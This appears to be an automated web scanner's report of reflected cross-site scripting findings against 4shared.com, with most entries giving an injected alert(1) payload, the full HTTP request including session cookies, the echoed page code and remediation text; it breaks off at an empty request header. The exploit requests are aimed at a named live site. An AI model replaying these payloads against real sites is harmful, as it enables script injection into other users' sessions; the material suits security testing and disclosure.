<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersbdfe3"-alert(1)-"24e87bceef2/desktop/300x250.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedbac ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e2c5"-alert(1)-"4c8ee2c4559 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop2e2c5"-alert(1)-"4c8ee2c4559/300x250.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24af2"-alert(1)-"972becc4068 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068 HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls; JSESSIONID=3CFB65BE110C065A39C53A13723EF882.dc278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/300x250.jsp24af2"-alert(1)-"972becc4068"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e997"-alert(1)-"7bb2d897bb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise3e997"-alert(1)-"7bb2d897bb0/banners/desktop/728x90.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a805f"-alert(1)-"4c476fd3f21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/bannersa805f"-alert(1)-"4c476fd3f21/desktop/728x90.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a31ad"-alert(1)-"d183c0a7079 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktopa31ad"-alert(1)-"d183c0a7079/728x90.jsp"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() {
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0759"-alert(1)-"b5db9f6f713 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713 HTTP/1.1 Host: www.4shared.com Proxy-Connection: keep-alive Referer: http://static.4shared.com/css/indexm.css6ce34'-alert(1)-'2fc82178551?ver=1610 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; search.view2=ls
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:http://static.4shared.com/c ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/advertise/banners/desktop/728x90.jspe0759"-alert(1)-"b5db9f6f713"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dabbb"-alert(1)-"c3f9028a5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contact.jspdabbb"-alert(1)-"c3f9028a5f HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/contact.jspdabbb"-alert(1)-"c3f9028a5f"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf1a6"-alert(1)-"93e9e1ca1ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51356"-alert(1)-"0c3edb7ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/css/common.css51356"-alert(1)-"0c3edb7ca9f"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17143"-alert(1)-"8e70496ad1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33c86"-alert(1)-"04029f7d211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.css33c86"-alert(1)-"04029f7d211"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f987f"-alert(1)-"dff384d2e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c20"-alert(1)-"0b7443b060a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9b8"-alert(1)-"fce9bca0f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /desktopeb9b8"-alert(1)-"fce9bca0f19/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/desktopeb9b8"-alert(1)-"fce9bca0f19/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var win ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4861a"-alert(1)-"6a1c01b4181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /enter.jsp4861a"-alert(1)-"6a1c01b4181 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jsp4861a"-alert(1)-"6a1c01b4181"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 was submitted in the au parameter. This input was echoed as 8fdd1"style="x:expression(alert(1))"f5d5aa7c370 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /enter.jsp?sId=o2l1egVaZXKhvv6e&&fau=1&au=18fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>4shared.com - free file sharing and storage - Login or Si ...[SNIP]... <input type="hidden" name="au" value="18fdd1"style="x:expression(alert(1))"f5d5aa7c370"/> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aae9"-alert(1)-"b86e0dc65d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /faq.jsp3aae9"-alert(1)-"b86e0dc65d2 HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/faq.jsp3aae9"-alert(1)-"b86e0dc65d2"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4137e"-alert(1)-"30ce14ead11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico4137e"-alert(1)-"30ce14ead11"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c041"-alert(1)-"b5aa33779a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /icons9c041"-alert(1)-"b5aa33779a/16x16/ HTTP/1.1 Host: www.4shared.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/icons9c041"-alert(1)-"b5aa33779a/16x16/"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { v ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cc4"-alert(1)-"8ad53ce0672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
